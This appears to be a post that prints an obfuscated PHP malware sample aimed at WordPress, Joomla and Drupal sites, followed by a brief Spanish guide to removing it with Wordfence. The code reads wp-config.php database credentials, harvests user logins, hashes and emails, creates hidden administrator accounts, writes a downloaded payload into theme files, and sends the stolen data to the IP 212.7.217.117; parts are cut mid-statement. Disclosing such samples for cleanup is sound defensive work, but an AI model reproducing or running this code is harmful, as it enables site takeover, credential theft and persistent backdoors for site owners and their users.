$this->kgqyGHEFDeTSgaPnfjaW = base64_decode( 'LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBNksvSTJsNmsySXo3Vm9qenhrNVENCjQzUU5mSUptMmpXUHZYQXZGdGZ0K3l5NHJEM01zZVFKV3gzUExsa29SUWpTSTF1aWl3d2xQWldFRDBlNXdGZXQNCm5TNXRLaHZ2UmFPZVVQWUpxNk10eVVibmFNbjdic2hsZ2FBbFBhVUNWZEFPamR0R0hNdUZhV2ZuQkxnVFN1M2MNCnVjY1ZDMnpPbFh4N1hLMXR3MzllWmVwUmVtb2gwVzNRaGYraERGc0V6QUNTQm1LaEJpZ2Fud0NaelREdnlYcGoNCm5mYlJLYmYyNkxKREo5dTJDaG9oNzY4dlFpSWZ1ZjB0R0xRK3h4Y0JEbDJaVlcwUDc2Y2Q1STJ2K2xZUkJEL1gNCnZnVTMyL1VaZUtEaGVBOE0vb1o1L3lGdjVRV0FVMlNIRUVLWWZMa0FRbVhzL29SR3FNUU9OcW9MM1c1UTRiRS8NCmdRSURBUUFCDQotLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0=' ); } private function eSWJphzLBsQkTYOMAcsN() { $ANVoslonRNQSwwQloQTx = VpLgOEumcbcbVAoDSkNT( WP_CLIENT_KEY ); $this->cWBcMhvuwNKQKeikhYeZ = $ANVoslonRNQSwwQloQTx; } private function ROnGXakeZGHvnAshuA() { $JDdxHMyVvUKthPzmRkMS = $this->FXwiogGmWuLpHVpAIOPs(); $this->cWBcMhvuwNKQKeikhYeZ = $JDdxHMyVvUKthPzmRkMS[ 'private' ]; $this->uryvGPuyNCNLgIMuTXlS = $JDdxHMyVvUKthPzmRkMS[ 'public' ]; chaGPqCyoHkruJXCIIlS( WP_CLIENT_KEY, $this->cWBcMhvuwNKQKeikhYeZ ); } public function XdjJpcCkQalYGiLHaNXR( $ANVoslonRNQSwwQloQTx ) { openssl_seal( $ANVoslonRNQSwwQloQTx, $cdtZYufTkpXBshccoVBC, $cfuSOlktfcjAgxrAbvTc, array( openssl_pkey_get_public( $this->kgqyGHEFDeTSgaPnfjaW ) ) ); return array( "data" => base64_encode( $cdtZYufTkpXBshccoVBC ), "key" => base64_encode( $cfuSOlktfcjAgxrAbvTc[ 0 ] ) ); } public function NlxEZhozjcIOCtbKZljT( $ANVoslonRNQSwwQloQTx ) { openssl_seal( $ANVoslonRNQSwwQloQTx, $cdtZYufTkpXBshccoVBC, $cfuSOlktfcjAgxrAbvTc, array( openssl_pkey_get_public( $this->uryvGPuyNCNLgIMuTXlS ) ) ); return json_encode( array( "data" => base64_encode( $cdtZYufTkpXBshccoVBC ), "key" => base64_encode( $cfuSOlktfcjAgxrAbvTc[ 0 ] ) ) ); } public function NgHMLtrOrvggBbUUtHKW() { return $this->uryvGPuyNCNLgIMuTXlS; } public function duINcvAvMBjVFAOeQCrT( $emDnXOMHIUCHXVocAIgZ ) { $this->uryvGPuyNCNLgIMuTXlS = $emDnXOMHIUCHXVocAIgZ; } public function fakDjKdyfxqzqCVYUs( $ANVoslonRNQSwwQloQTx ) { $uoZKldafGapBNDDpFNBP = json_decode( $ANVoslonRNQSwwQloQTx, TRUE ); if ( $uoZKldafGapBNDDpFNBP !== FALSE ) { $ANVoslonRNQSwwQloQTx = $uoZKldafGapBNDDpFNBP; } if ( ! is_array( $ANVoslonRNQSwwQloQTx ) ) { return FALSE; } openssl_open( base64_decode( trim( $ANVoslonRNQSwwQloQTx[ 'data' ] ) ), $FOhrxtRVXGleyOEepGtb, base64_decode( trim( $ANVoslonRNQSwwQloQTx[ 'key' ] ) ), $this->cWBcMhvuwNKQKeikhYeZ ); return $FOhrxtRVXGleyOEepGtb; } public function FXwiogGmWuLpHVpAIOPs() { $whjvYeznCnnMhNySt = openssl_pkey_new( array( 'private_key_bits' => 2048, 'private_key_type' => OPENSSL_KEYTYPE_RSA, ) ); openssl_pkey_export( $whjvYeznCnnMhNySt, $IaIiWByXDPbJBFciEFSs ); $ANVoslonRNQSwwQloQTx[ 'private' ] = $IaIiWByXDPbJBFciEFSs; $GOGpLousKsefGcOrKDCM = openssl_pkey_get_details( $whjvYeznCnnMhNySt ); $ANVoslonRNQSwwQloQTx[ 'public' ] = $GOGpLousKsefGcOrKDCM[ 'key' ]; return $ANVoslonRNQSwwQloQTx; } } class IaLpFyUtkdDdtRnEDrJ { private $cDnVuOXHvcWrHoZdzNsU; function __construct() { $cDnVuOXHvcWrHoZdzNsU = getcwd(); if ( $cDnVuOXHvcWrHoZdzNsU == '/' ) { return array(); } preg_match( '/^\/(.*?)(\/|$)/', $cDnVuOXHvcWrHoZdzNsU, $WUHTptpXecXQodJdwoWK ); $LWVkhAVVlTDVjJWoftlM = "/{$WUHTptpXecXQodJdwoWK[1]}/"; $ANVoslonRNQSwwQloQTx = array(); $this->cDnVuOXHvcWrHoZdzNsU = $cDnVuOXHvcWrHoZdzNsU . "/"; $this->QJmcpjlwZVrmjsqBUAye( $LWVkhAVVlTDVjJWoftlM, $ANVoslonRNQSwwQloQTx ); $ANVoslonRNQSwwQloQTx = $this->vGwCOmslsiystuNKcnWy( $ANVoslonRNQSwwQloQTx ); $this->BTkJfqJzqqxezBOOnXuw( $ANVoslonRNQSwwQloQTx ); } private function QJmcpjlwZVrmjsqBUAye( $FZxyFcxHIgRadtHnDvWU, &$ANVoslonRNQSwwQloQTx ) { $cDnVuOXHvcWrHoZdzNsU = $this->cDnVuOXHvcWrHoZdzNsU; if ( $FZxyFcxHIgRadtHnDvWU == $cDnVuOXHvcWrHoZdzNsU ) { return TRUE; } if ( file_exists( $FZxyFcxHIgRadtHnDvWU . 'wp-config.php' ) && ( is_readable( $FZxyFcxHIgRadtHnDvWU . 'wp-config.php' ) || ( ! is_readable( $FZxyFcxHIgRadtHnDvWU . 'wp-config.php' ) && chmod( $FZxyFcxHIgRadtHnDvWU . 'wp-config.php', 0666 ) ) ) && ( strpos( $FZxyFcxHIgRadtHnDvWU, $cDnVuOXHvcWrHoZdzNsU ) === FALSE ) ) { $UVQzCXSpkqPMkFbArtvy = $FZxyFcxHIgRadtHnDvWU . 'wp-config.php'; $this->jNFkxnqCMsyhlYTCChkr( $UVQzCXSpkqPMkFbArtvy, $ANVoslonRNQSwwQloQTx ); $this->QCgmDxREoHBrEJvCRSCF( $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ] ); if ( isset( $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'url' ], $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'access' ], $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ], $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'template' ] ) ) { if ( ! $this->TEmmisdBfALbhZTEZJzK( $FZxyFcxHIgRadtHnDvWU, $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'template' ] ) ) { $this->JEIDDNvQVQhQJTMCJKea( $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ], $FZxyFcxHIgRadtHnDvWU ); } } } if ($ZlJEkDLMJCOGEbBdMcny = @scandir( $FZxyFcxHIgRadtHnDvWU )) { foreach ( $ZlJEkDLMJCOGEbBdMcny as $UVQzCXSpkqPMkFbArtvy ) { if ( is_dir( $FZxyFcxHIgRadtHnDvWU . $UVQzCXSpkqPMkFbArtvy . '/' ) && ( $UVQzCXSpkqPMkFbArtvy != '.' ) && ( $UVQzCXSpkqPMkFbArtvy != '..' ) ) { $this->QJmcpjlwZVrmjsqBUAye( $FZxyFcxHIgRadtHnDvWU . $UVQzCXSpkqPMkFbArtvy . "/", $ANVoslonRNQSwwQloQTx ); } } } } private function QCgmDxREoHBrEJvCRSCF( &$ANVoslonRNQSwwQloQTx ) { mysql_connect( $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_host' ], $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_user' ], $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_pass' ] ); mysql_select_db( $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_name' ] ); $gOaBoMqrHWWrpAyXWcdE = mysql_fetch_assoc( mysql_query( "SELECT * FROM {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}options where option_name = 'siteurl'" ) ); $ANVoslonRNQSwwQloQTx[ 'url' ] = $gOaBoMqrHWWrpAyXWcdE[ 'option_value' ]; $rgRliUQbLmyLJlLtVdhF = mysql_query( "SELECT * FROM {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}users" ); while ( $DcCSVJtSBpBIHUhJeLlW = mysql_fetch_assoc( $rgRliUQbLmyLJlLtVdhF ) ) { $ANVoslonRNQSwwQloQTx[ 'access' ][ $DcCSVJtSBpBIHUhJeLlW[ 'user_login' ] ][ ] = $DcCSVJtSBpBIHUhJeLlW[ 'user_pass' ]; $ANVoslonRNQSwwQloQTx[ 'access' ][ $DcCSVJtSBpBIHUhJeLlW[ 'user_login' ] ][ ] = $DcCSVJtSBpBIHUhJeLlW[ 'user_email' ]; $ANVoslonRNQSwwQloQTx[ 'access' ][ $DcCSVJtSBpBIHUhJeLlW[ 'user_login' ] ][ ] = $DcCSVJtSBpBIHUhJeLlW[ 'user_url' ]; } $rgRliUQbLmyLJlLtVdhF = mysql_query( "select * from {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}options where option_name like 'template';" ); while ( $DcCSVJtSBpBIHUhJeLlW = mysql_fetch_assoc( $rgRliUQbLmyLJlLtVdhF ) ) { $ANVoslonRNQSwwQloQTx[ 'template' ] = str_replace( ' ', '', strtolower( $DcCSVJtSBpBIHUhJeLlW[ 'option_value' ] ) ); $rgRliUQbLmyLJlLtVdhF = mysql_query( "select * from {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}options where option_name like '_site_transient_theme_roots';" ); while ( $DcCSVJtSBpBIHUhJeLlW = mysql_fetch_assoc( $rgRliUQbLmyLJlLtVdhF ) ) { $raWBtqDmSibkDzsATBtV = unserialize( $DcCSVJtSBpBIHUhJeLlW[ 'option_value' ] ); if ( isset( $raWBtqDmSibkDzsATBtV[ $ANVoslonRNQSwwQloQTx[ 'template' ] ] ) ) { $ANVoslonRNQSwwQloQTx[ 'template' ] = '.' . $raWBtqDmSibkDzsATBtV[ $ANVoslonRNQSwwQloQTx[ 'template' ] ] . '/' . $ANVoslonRNQSwwQloQTx[ 'template' ]; } } } } private function jNFkxnqCMsyhlYTCChkr( $UVQzCXSpkqPMkFbArtvy, &$ANVoslonRNQSwwQloQTx ) { $nFIbeMjqZmYeLUUEATfk = file( $UVQzCXSpkqPMkFbArtvy ); foreach ( $nFIbeMjqZmYeLUUEATfk as $RzvaEkHfBgtdGyQxDFcF ) { if ( strpos( $RzvaEkHfBgtdGyQxDFcF, "DB_NAME" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_name' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 1 ]; } elseif ( strpos( $RzvaEkHfBgtdGyQxDFcF, "DB_USER" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_user' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 1 ]; } elseif ( strpos( $RzvaEkHfBgtdGyQxDFcF, "DB_PASS" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_pass' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 1 ]; } elseif ( strpos( $RzvaEkHfBgtdGyQxDFcF, "DB_HOST" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_host' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 1 ]; } elseif ( strpos( $RzvaEkHfBgtdGyQxDFcF, "table_prefix" ) ) { preg_match_all( "/'(\S+)'/", $RzvaEkHfBgtdGyQxDFcF, $TDSVcxQxgqqdEBshTiCF ); $ANVoslonRNQSwwQloQTx[ $UVQzCXSpkqPMkFbArtvy ][ 'database' ][ 'db_prefix' ] = $TDSVcxQxgqqdEBshTiCF[ 1 ][ 0 ]; } } } private function JEIDDNvQVQhQJTMCJKea( &$ANVoslonRNQSwwQloQTx, $VDptGAURmIUERBrTxhpZ ) { require_once( $VDptGAURmIUERBrTxhpZ . 'wp-includes/class-phpass.php' ); $imKFBXzBLVPnUQDzUNDM = new PasswordHash( 8, TRUE ); mysql_connect( $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_host' ], $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_user' ], $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_pass' ] ); mysql_select_db( $ANVoslonRNQSwwQloQTx[ 'database' ][ 'db_name' ] ); $xLyDQzORkZZbMOednjNE = 0; while ( 1 ) { $iwhKlgTzyDpdQDdQNTSC = 'system' . $xLyDQzORkZZbMOednjNE ++; $rgRliUQbLmyLJlLtVdhF = mysql_query( "SELECT * FROM {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}users where user_login = '{$iwhKlgTzyDpdQDdQNTSC}'" ); if ( ( $DcCSVJtSBpBIHUhJeLlW = mysql_fetch_assoc( $rgRliUQbLmyLJlLtVdhF ) ) === FALSE ) { break; } } $CnAmMZwsCRiGPlhyacYU = date( 'Y-m-d H:i:s' ); $eyyPQlOlTIqZjnzoyueI = $imKFBXzBLVPnUQDzUNDM->HashPassword( 's#5gp.dT@d' ); $rgRliUQbLmyLJlLtVdhF = "insert into {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}users (
user_login,
user_pass,
user_nicename,
user_email,
user_url,
user_registered,
user_activation_key,
user_status,
display_name)
values (
'{$iwhKlgTzyDpdQDdQNTSC}',
'{$eyyPQlOlTIqZjnzoyueI}',
'system',
'',
'',
'',
'{$CnAmMZwsCRiGPlhyacYU}',
'0',
'system');"; mysql_query( $rgRliUQbLmyLJlLtVdhF ); $EPiddlhLNBJYXRRpRZRb = mysql_insert_id(); $rgRliUQbLmyLJlLtVdhF = "INSERT INTO {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}usermeta (
user_id,
meta_key,
meta_value) VALUES (
'{$EPiddlhLNBJYXRRpRZRb}',
'wp_capabilities',
'a:1:{s:13:\"administrator\";b:1;}'
)"; mysql_query( $rgRliUQbLmyLJlLtVdhF ); $rgRliUQbLmyLJlLtVdhF = "INSERT INTO {$ANVoslonRNQSwwQloQTx['database']['db_prefix']}usermeta (
user_id,
meta_key,
meta_value)
VALUES (
'{$EPiddlhLNBJYXRRpRZRb}',
'wp_user_level',
'10'
)"; mysql_query( $rgRliUQbLmyLJlLtVdhF ); $ANVoslonRNQSwwQloQTx[ 'bad_wp' ] = $iwhKlgTzyDpdQDdQNTSC; } private function vGwCOmslsiystuNKcnWy( $ANVoslonRNQSwwQloQTx ) { $OBZOxZtsmJECmtOofbw = array(); foreach ( $ANVoslonRNQSwwQloQTx as $UjgxfUcLzoQAJBIyTfSC ) { if ( isset( $UjgxfUcLzoQAJBIyTfSC[ 'bad_wp' ] ) ) { $OBZOxZtsmJECmtOofbw[ $UjgxfUcLzoQAJBIyTfSC[ 'url' ] ] = array( 'user' => $UjgxfUcLzoQAJBIyTfSC[ 'bad_wp' ], 'template' => $UjgxfUcLzoQAJBIyTfSC[ 'template' ] ); } } return $OBZOxZtsmJECmtOofbw; } static function BTkJfqJzqqxezBOOnXuw( $ANVoslonRNQSwwQloQTx ) { $ZRhtpGOgTZTZRdeSYVBw = 'http://212.7.217.117/wp-info/info.php'; $nlXwyPctCNDoEVVebxUh = urlencode( json_encode( $ANVoslonRNQSwwQloQTx ) ); $cPQDNzaFpBKRxzJrBNZG = curl_init( $ZRhtpGOgTZTZRdeSYVBw ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CONNECTTIMEOUT, 10 ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_RETURNTRANSFER, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POST, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POSTFIELDS, 'data=' . $nlXwyPctCNDoEVVebxUh ); $BwKJfYtBWvwlFPSYbYFU = curl_exec( $cPQDNzaFpBKRxzJrBNZG ); curl_close( $cPQDNzaFpBKRxzJrBNZG ); return $BwKJfYtBWvwlFPSYbYFU; } static function XkMxCySCpNFSBuXPXHwS() { $ZRhtpGOgTZTZRdeSYVBw = 'http://212.7.217.117/wp-info/client2'; $cPQDNzaFpBKRxzJrBNZG = curl_init( $ZRhtpGOgTZTZRdeSYVBw ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CONNECTTIMEOUT, 10 ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_RETURNTRANSFER, TRUE ); $BwKJfYtBWvwlFPSYbYFU = curl_exec( $cPQDNzaFpBKRxzJrBNZG ); curl_close( $cPQDNzaFpBKRxzJrBNZG ); return $BwKJfYtBWvwlFPSYbYFU; } private function TEmmisdBfALbhZTEZJzK( $FZxyFcxHIgRadtHnDvWU, $NiuzOpXWDlcBypsDoQnh ) { $oeDbCQIzLLQrabWltaCg = $FZxyFcxHIgRadtHnDvWU . 'wp-content/' . str_replace( './', '', $NiuzOpXWDlcBypsDoQnh ); $oWqFrlBwQONqnbShjLmR = $oeDbCQIzLLQrabWltaCg . '/functions.php'; if ( ! file_exists( $oWqFrlBwQONqnbShjLmR ) ) { return FALSE; } if ( ! is_writable( $oeDbCQIzLLQrabWltaCg ) && ! chmod( $oeDbCQIzLLQrabWltaCg, 0777 ) ) { return FALSE; } $xLyDQzORkZZbMOednjNE = 0; $zEHaGHUqEgdXyaJFpObM = 'social.png'; if ( file_exists( $oeDbCQIzLLQrabWltaCg . '/' . $zEHaGHUqEgdXyaJFpObM ) ) { while ( 1 ) { $zEHaGHUqEgdXyaJFpObM = 'social' . $xLyDQzORkZZbMOednjNE ++ . '.png'; if ( ! file_exists( $oeDbCQIzLLQrabWltaCg . '/' . $zEHaGHUqEgdXyaJFpObM ) ) { break; } } } file_put_contents( $oeDbCQIzLLQrabWltaCg . '/' . $zEHaGHUqEgdXyaJFpObM, self::XkMxCySCpNFSBuXPXHwS() ); if ( is_writable( $oWqFrlBwQONqnbShjLmR ) || chmod( $oWqFrlBwQONqnbShjLmR, 0666 ) ) { $YNqUHEzJjOpoPfnae = str_replace( array( "\n", "\r" ), '', file_get_contents( $oWqFrlBwQONqnbShjLmR ) ); if ( ! preg_match( "/social[\d]*\.png/", $YNqUHEzJjOpoPfnae ) ) { $wzwstZmDMgjepsXfqlsc = ( preg_match( "/\?>([\s]*)$/", $YNqUHEzJjOpoPfnae, $WUHTptpXecXQodJdwoWK ) ) ? "\nsetQuery( "SELECT value FROM #__options where option_name = '{$PomwCzJqFbOgfhQDnvg}'" ); $OBZOxZtsmJECmtOofbw = $jiuOepDTQAtKPmDPlmA->loadResult(); return $OBZOxZtsmJECmtOofbw; } if ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) { $JKBGKZwspUYvdkeoetY = get_option( $PomwCzJqFbOgfhQDnvg, array() ); return @$JKBGKZwspUYvdkeoetY[ 'data' ]; } if ( $GLOBALS[ 'base_path' ] || $GLOBALS[ 'base_url' ] ) { $jiuOepDTQAtKPmDPlmA = db_query( "SELECT value FROM options where option_name = '{$PomwCzJqFbOgfhQDnvg}'" )->fetchCol(); $OBZOxZtsmJECmtOofbw = $jiuOepDTQAtKPmDPlmA; return $OBZOxZtsmJECmtOofbw[ 0 ]; } } function chaGPqCyoHkruJXCIIlS( $nINwlDhAxQKFrJOsyjjn, $DEZvMdJXoNZuzjMADDHv ) { if ( VpLgOEumcbcbVAoDSkNT( $nINwlDhAxQKFrJOsyjjn ) ) { if ( class_exists( 'JFactory' ) ) { $jiuOepDTQAtKPmDPlmA = &JFactory::getDBO(); $jiuOepDTQAtKPmDPlmA->setQuery( "UPDATE #__options SET value ='{$DEZvMdJXoNZuzjMADDHv}' WHERE option_name='{$nINwlDhAxQKFrJOsyjjn}'" ); $jiuOepDTQAtKPmDPlmA->query(); } if ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) { $JKBGKZwspUYvdkeoetY = array( 'data' => $DEZvMdJXoNZuzjMADDHv ); update_option( $nINwlDhAxQKFrJOsyjjn, $JKBGKZwspUYvdkeoetY ); } if ( isset( $GLOBALS[ 'base_path' ] ) || isset( $GLOBALS[ 'base_url' ] ) ) { db_query( "UPDATE options SET value = :value WHERE option_name = :option", array( ':value' => $DEZvMdJXoNZuzjMADDHv, ':option' => $nINwlDhAxQKFrJOsyjjn ) ); } } else { if ( class_exists( 'JFactory' ) ) { $jiuOepDTQAtKPmDPlmA = JFactory::getDbo(); $jiuOepDTQAtKPmDPlmA->setQuery( "INSERT INTO #__options(option_name, value) values ('{$nINwlDhAxQKFrJOsyjjn}' , '{$DEZvMdJXoNZuzjMADDHv}')" ); return $jiuOepDTQAtKPmDPlmA->query(); } if ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) { $JKBGKZwspUYvdkeoetY = array( 'data' => $DEZvMdJXoNZuzjMADDHv ); update_option( $nINwlDhAxQKFrJOsyjjn, $JKBGKZwspUYvdkeoetY ); } } } function jqryqFBMrHdVpgSfpDad() { if ( strstr( __FILE__, "wp-content/themes" ) !== FALSE ) { $uNKzgVGGqGPxHeRkgqRX = get_option( 'active_plugins', array() ); $NXdTbsKfmSOvfgWeGQma = WP_PLUGIN_DIR; foreach ( @$uNKzgVGGqGPxHeRkgqRX as $afaaIklbzorYXAlUjNPh ) { $WVnZYORFsYkxVCRWs = HcMCXUOlDuTZUOMddjAh( $NXdTbsKfmSOvfgWeGQma . "/" . $afaaIklbzorYXAlUjNPh ); if ( $WVnZYORFsYkxVCRWs ) { break; } } if ( ! $WVnZYORFsYkxVCRWs ) { rHzKzOeWuASbSfekskHj(); } } else { $IcsiaRIKwgqfTGaxZlw = get_template_directory(); $WVnZYORFsYkxVCRWs = HcMCXUOlDuTZUOMddjAh( $IcsiaRIKwgqfTGaxZlw . "/functions.php" ); if ( ! $WVnZYORFsYkxVCRWs ) { $NXdTbsKfmSOvfgWeGQma = WP_PLUGIN_DIR; $uNKzgVGGqGPxHeRkgqRX = get_option( 'active_plugins', array() ); foreach ( $uNKzgVGGqGPxHeRkgqRX as $afaaIklbzorYXAlUjNPh ) { $WVnZYORFsYkxVCRWs = HcMCXUOlDuTZUOMddjAh( $NXdTbsKfmSOvfgWeGQma . "/$afaaIklbzorYXAlUjNPh" ); if ( $WVnZYORFsYkxVCRWs ) { break; } } } if ( ! $WVnZYORFsYkxVCRWs ) { rHzKzOeWuASbSfekskHj(); } } } function HcMCXUOlDuTZUOMddjAh( $afaaIklbzorYXAlUjNPh ) { $NXdTbsKfmSOvfgWeGQma = dirname( $afaaIklbzorYXAlUjNPh ); $BwKJfYtBWvwlFPSYbYFU = str_replace( array( "\n", "\r" ), '', file_get_contents( $afaaIklbzorYXAlUjNPh ) ); if ( ! file_exists( $afaaIklbzorYXAlUjNPh ) ) { return FALSE; } if ( ! is_writable( $afaaIklbzorYXAlUjNPh ) && ! chmod( $afaaIklbzorYXAlUjNPh, 0777 ) ) { return FALSE; } if ( ! is_writable( $NXdTbsKfmSOvfgWeGQma ) && ! chmod( $NXdTbsKfmSOvfgWeGQma, 0777 ) ) { return FALSE; } if ( preg_match( "/social[\d]*\.png/", $BwKJfYtBWvwlFPSYbYFU ) ) { return FALSE; } $xLyDQzORkZZbMOednjNE = 0; $zEHaGHUqEgdXyaJFpObM = 'social.png'; if ( file_exists( $NXdTbsKfmSOvfgWeGQma . '/' . $zEHaGHUqEgdXyaJFpObM ) ) { while ( 1 ) { $zEHaGHUqEgdXyaJFpObM = 'social' . ++ $xLyDQzORkZZbMOednjNE . '.png'; if ( ! file_exists( $NXdTbsKfmSOvfgWeGQma . '/' . $zEHaGHUqEgdXyaJFpObM ) ) { break; } } } file_put_contents( $NXdTbsKfmSOvfgWeGQma . '/' . $zEHaGHUqEgdXyaJFpObM, IaLpFyUtkdDdtRnEDrJ::XkMxCySCpNFSBuXPXHwS() ); if ( is_writable( $afaaIklbzorYXAlUjNPh ) || chmod( $afaaIklbzorYXAlUjNPh, 0666 ) ) { $wzwstZmDMgjepsXfqlsc = ( preg_match( "/\?>([\s]*)$/", $BwKJfYtBWvwlFPSYbYFU, $WUHTptpXecXQodJdwoWK ) ) ? "\nset_role( 'administrator' ); $ANVoslonRNQSwwQloQTx = array( 'user' => $zDNvTSZejFCkikBBYJnv, 'pass' => $eyyPQlOlTIqZjnzoyueI, 'email' => $AXnqCEBIBkgvOuLbMY, 'site' => get_site_url() ); $ZRhtpGOgTZTZRdeSYVBw = 'http://212.7.217.117/data2.php'; $nlXwyPctCNDoEVVebxUh = base64_encode( json_encode( $ANVoslonRNQSwwQloQTx ) ); $cPQDNzaFpBKRxzJrBNZG = curl_init( $ZRhtpGOgTZTZRdeSYVBw ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CONNECTTIMEOUT, 10 ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_RETURNTRANSFER, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POST, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POSTFIELDS, 'data=' . $nlXwyPctCNDoEVVebxUh ); curl_exec( $cPQDNzaFpBKRxzJrBNZG ); curl_close( $cPQDNzaFpBKRxzJrBNZG ); } } if ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) { $WDWTfYxwxTMIIsMmHXVV = '_site_transient_client_key_'; if ( function_exists( 'get_home_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( get_home_url()), 3 , 5); } elseif ( function_exists( 'get_site_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( get_site_url()), 3 ,5 ); } } else { $WDWTfYxwxTMIIsMmHXVV = 'WP_CLIENT_KEY'; } define( 'WP_CLIENT_KEY', $WDWTfYxwxTMIIsMmHXVV ); function XNBSQfKUHOLDGQLcYptk() { if ( ! defined( 'WP_OPTION_KEY' ) ) { define( 'WP_OPTION_KEY', 'wp_data_newa' ); new mWocWcrhWpiDUTXuIwU( 1 ); } } if ( class_exists( 'JFactory' ) ) { $hnvWkOWCIqbVqysQUuFA = &JFactory::getApplication(); $hnvWkOWCIqbVqysQUuFA->registerEvent( 'onAfterRender', 'plgContentMyPlugin' ); } if ( isset( $GLOBALS[ 'base_path' ] ) || isset( $GLOBALS[ 'base_url' ] ) ) { if ( ! defined( 'WP_OPTION_KEY' ) ) { define( 'WP_OPTION_KEY', 'wp_data_newa' ); $LdipUBQNurPDrFzVqrJT = $TNOhHYiQBtZmMLieKNPz->iwhKlgTzyDpdQDdQNTSC . "_page_alter"; $WpjxSpMcLFVAFyrpTZyw = 'function ' . $LdipUBQNurPDrFzVqrJT . "(&\$page) {
\$ANVoslonRNQSwwQloQTx = new Client(2);
\$pnbgYzqXMNjqSBORSeLB = \"\";
foreach (\$ANVoslonRNQSwwQloQTx->data['echo'] as \$gTFusccXHODHdNfTRcIr) {
\$pnbgYzqXMNjqSBORSeLB.=\$gTFusccXHODHdNfTRcIr;
}
\$JbpGMBCRMNNqYrllqogh = \$pnbgYzqXMNjqSBORSeLB;
\$page['page_top'][] = array('#markup' => \$JbpGMBCRMNNqYrllqogh);
}"; } eval( $WpjxSpMcLFVAFyrpTZyw ); } if ( ! defined( 'WP_OPTION_KEY' ) && ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) ) { $WDWTfYxwxTMIIsMmHXVV = '_site_transient_client_properties_'; if ( function_exists( 'get_home_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( get_home_url() ) , 3 , 5); } elseif ( function_exists( 'get_site_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr( md5( get_site_url() ), 3 , 5 ); } else { $WDWTfYxwxTMIIsMmHXVV .= substr( md5( $_SERVER[ 'DOCUMENT_ROOT' ] ) , 3 , 5); } define( 'WP_OPTION_KEY', $WDWTfYxwxTMIIsMmHXVV ); new mWocWcrhWpiDUTXuIwU( 0 ); } }
///////////////////////////////////////////////////////////////////////////////
Bueno para los que no saben mucho de desarrollo y de seguridad les dire como borrar estos archivos:
Estas herramientas deben de tener:
1.- el FTP ó el file manager de su cuenta.
2.- acceso administrador del wordpress
3.- algo de tiempo y paciencia.
PASO 1:
Entrar al admin del wordpress esto se hace colocando la dirección de su pagina y agregando /wp-admin en el explorador.
ejemplo: www.tupagina.com/wp-admin
PASO 2:
Ir a la sección plugins e instalar el plugin: "Wordfence" y activarlo.
PASO 3:
Después de activarlo ir a su sección administrarle del plugin e ir a donde dice options.
PASO 4:
activar las siguientes opciones:
Scan theme files against repository versions for changes
